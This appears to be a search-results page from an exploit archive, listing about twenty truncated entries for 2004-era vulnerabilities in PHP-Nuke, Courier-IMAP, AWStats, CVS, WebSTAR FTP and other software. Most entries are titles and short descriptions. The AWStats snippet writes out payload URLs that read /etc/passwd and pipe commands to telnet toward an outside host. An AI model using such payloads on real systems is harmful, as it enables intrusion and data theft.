3100 matches found
[XSS]/SQL Injection PHP-Nuke Delete Message(s) Bug
XSS/SQL Injection PHP-Nuke Delete Messages Bug by bima Php-Nuke is a popular freeware content management system. Based on information at : http://www.mantralab.org/modules.php/modulo/news/lanotizia/5BXSS5D+PHP-Nuke+7.4+Add+Message+Bug An attacker permitted to post to global home-page messages. I...
Cisco IOS ACL Bypass (Bug ID CSCdi34061)
Binary data 2195.prm...
MailWorks Professional - Authentication bypass
Pimp industries. "Its all about the Bling, B^!@s and Fame!" MailWorks Professional All versions Authentication bypass via cookie control C Paul Craig - Pimp Industries 2004 Background ------------- MailWorks Professional is a mailing list management application, developed by sitecubed. It provide...
Courier-IMAP <= 3.0.2-r1 auth_debug() Remote Format String Exploit
Exploit for bsd platform in category remote exploits ================================================================== Courier-IMAP = 3.0.2-r1 authdebug Remote Format String Exploit ================================================================== / courier-imap = 3.0.2-r1 Remote Format String...
D-Link DCS-900 Camera Remote IP Address Changer Exploit
No description provided by source. / dlinkdown.c - miscname.com change ip address on all dlink dcs-900 cameras on the local network without authentication dlink dcs-900 ip cameras use a broadcast/listen method of configuration ... rather than a static ip addr out of the box, it listens for a...
AWStats 5.0 < 6.3 - 'logfile' File Inclusion / Command Execution
Example: http://target/awstats.pl?filterrawlog=&rawlogmaxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&log file=/etc/passwd http://target/awstats.pl?filterrawlog=&rawlogmaxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&logfile=&logfile=|telnet milw0rm.co...
LibPNG <= 1.2.5 png_jmpbuf() Local Buffer Overflow Exploit
Exploit for linux platform in category local exploits ========================================================== LibPNG include include "png.h" / The pngjmpbuf macro, used in error handling, became available in libpng version 1.0.6. If you want to be able to run your code with older versions of...
IceWarp Web Mail 3.3.2/5.2.7 - Multiple Remote Input Validation Vulnerabilities
source: https://www.securityfocus.com/bid/10920/info IceWarp Web Mail is reported prone to multiple input validation vulnerabilities. It is reported that these issues may be exploited by a remote attacker to conduct SQL Injection, Account Manipulation, Cross-site Scripting, Information disclosure...
CVSTrac - Arbitrary Code Execution
filediff?f=CVSROOT/rcsinfo&v1=1.1&v2=1.2;last; milw0rm.com 2004-08-06...
4D WebStar Pre-authentication FTP Overflow
There is a buffer overflow condition in the remote version of 4D WebStar FTP Server installed on the remote host. An attacker may exploit this flaw to execute arbitrary code on the remote host with the privileges of the FTP server root. C Tenable Network Security, Inc. include"compat.inc";...
WebSTAR FTP Server 5.3.2 (OSX) - USER Overflow (Metasploit)
WebSTAR FTP Server 5.3.2 OSX - USER Overflow Metasploit $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use...
CVS - Remote Entry Line Root Heap Overflow
include include include include include include include include include include include include include include define CVSPORT 2401 define RET 0xffbffd20 define NOP 0x82102017 define ROUNDs if s % wordsize s += wordsize - s % wordsize unsigned char root; unsigned char user; unsigned char pass;...
Orenosv HTTPFTP Server 0.5.9 - GET Denial of Service (1)
Orenosv HTTPFTP Server 0.5.9 - GET Denial of Service 1 // source: https://www.securityfocus.com/bid/10420/info Orenosv HTTP/FTP server is prone to a denial of service vulnerability that may occur when an overly long HTTP GET request is sent to the server. When the malicious request is handled, it...
RoseAttackv2.txt
/ ROSE attack variation 2 chuck at lemure.net Discovered by: gandalf at digital.net code modified from large IGMP attack by: Kox by Coolio coolio at k-r4d.com Sends out small IP fragments totalling up to a large ICMP packet. Then repeatedly sends last IP Fragment forcing reassembly code to traver...
FilePocket 1.2 Local Proxy Password Disclosure Exploit
Exploit for unknown platform in category local exploits ====================================================== FilePocket 1.2 Local Proxy Password Disclosure Exploit ====================================================== / FilePocket v1.2 Local Proxy Password Disclosure Exploit by Kozan...
GoText 1.01 Local User Informations Disclosure Exploit
Exploit for unknown platform in category local exploits ====================================================== GoText 1.01 Local User Informations Disclosure Exploit ====================================================== / GoText 1.01 Local User Informations Disclosure Exploit by Kozan Applicatio...
PW New Media Network Modular Site Management System 0.2.1 - Ver.asp Information Disclosure
PW New Media Network Modular Site Management System 0.2.1 - Ver.asp Information Disclosure source: https://www.securityfocus.com/bid/10208/info It has been reported that Modular Site Management System may be prone to an information disclosure issue that could allow an attacker to gain access to a...
PISG 0.54 - IRC Nick HTML Injection
PISG 0.54 - IRC Nick HTML Injection source: https://www.securityfocus.com/bid/10195/info pisg has been reported prone to an input validation vulnerability. The issue will only present itself when pisg is used to monitor an IRC server that does not place limitations on IRC Nick values that can be...
Include vulnerability in GEMITEL v 3.50
GEMITEL V 3 build 50 :: include vulnerability URL : http://www.isesam.com/ FORUM : http://www.isesam.com/forums/gemitel/threadopen.shtml Vendor has been contacted. Description : --------------- Gemitel is a free software written in php that allows to manage micro payments like allopass,...
Mcafee FreeScan CoMcFreeScan Browser - Information Disclosure
Mcafee FreeScan CoMcFreeScan Browser - Information Disclosure source: https://www.securityfocus.com/bid/10077/info Reportedly the Mcafee FreeScan 'McFreeScan.CoMcFreeScan.1' COM object is prone to a remote information disclosure vulnerability. This issue is due to a failure of the object to...